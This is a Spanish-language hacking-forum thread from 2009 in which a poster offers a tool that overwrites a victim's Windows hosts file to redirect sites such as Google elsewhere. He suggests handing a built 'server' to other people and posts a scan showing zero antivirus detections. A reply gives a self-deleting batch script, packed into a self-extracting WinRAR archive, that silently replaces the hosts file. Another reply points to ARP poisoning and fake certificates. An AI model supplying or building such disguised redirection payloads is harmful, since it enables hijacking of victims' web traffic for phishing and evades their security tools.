Bueno... aqui les dejo una aplicación que acabo de hacer para entretenerme un rato que lo que hace es "envenenar" el archivo hosts.. que significa esto?
Mediante esta aplicación podemos hacer que cuando una persona ingrese por ejemplo en "[Enlace externo eliminado para invitados]" en lugar de ir a google vaya a otro lado por decir algo...

Pueden ejecutarlo en su propia PC o crear un server para darlselo a otra persona.

Imagen


File Info

Report generated: 13.10.2009 at 2.57.48 (GMT 1)
Filename: server.exe
File size: 20573
MD5 Hash: 5d4371721d7bec99fc4e98d0c302058d
SHA1 Hash: D180E034B553E0AB6BC9B13D009CCAFB40195AF9
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 0 on 23

Detections

a-squared - -
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -

Scan report generated by
[Enlace externo eliminado para invitados]


DESCARGA: [Enlace externo eliminado para invitados]
Nota: Yo soy OwlHack
xD es mas facil crear un bat bueno yo asi le hago para este metodo xD y lo pongo en un autoejecutable en el winrar es decir

@echo off
copy "hosts" "ruta"
del archivo.bat
exit

ya nomas es crear el hosts nuevo con las modificaciones y meterlo todo en un autoejecutable de win rar y ejecutar el bat tras la extraccion

pero igual buen programa saludos creo qe tu metodo es mas corto y simple
//mHmm..
hackbs escribió:jaja pues si.. la idea seria ayudar a los que no saben hacerlo de otro modo
jaja pues eso si
//mHmm..
Con Cain se pueden hacer cosas bastante interesantes sobre envenenamientos de ARP e implementación de certificados falsos para conseguir envenenamientos de este tipo pero sin necesidad de ejecución de aplicaciones... igualmente es una aplicación chula! así que escupan sus ideas!
No importa cuan rápida y avanzada sea la tecnología, la mente humana aún es el procesador más versátil y creativo que hay.
Claro gente ahora lo resubo en otro lado y tambien voy a poner el PH-Inyector que te deja poner mas de una IP y dominio.

EDITO: Ok. Lo prometido es deuda: viewtopic.php?f=12&t=16169
Responder

Volver a “Nuestros Programas”